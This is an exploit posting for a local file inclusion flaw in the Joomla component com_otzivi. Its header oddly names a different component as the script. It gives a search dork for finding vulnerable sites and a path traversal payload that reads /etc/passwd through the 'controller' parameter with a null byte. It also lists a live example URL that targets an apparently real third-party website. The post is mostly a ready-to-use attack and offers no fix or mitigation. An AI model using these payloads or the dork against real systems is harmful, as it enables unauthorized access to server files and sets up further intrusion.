Joomla Component com_otzivi Local File Inclusion ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : Joomla Component com_ccnewsletter .:. Bug Type : Local File Inclusion [LFI] .:. Dork : inurl:"com_otzivi" #################################################################### ===[ Exploit ]=== www.site.com/index.php?option=com_otzivi&controller=[LFI] www.site.com/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00 Example: http://www.golden-truffle.ru/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00 #################################################################### ________________________________ Hotmail: Powerful Free email with security by Microsoft. Get it now.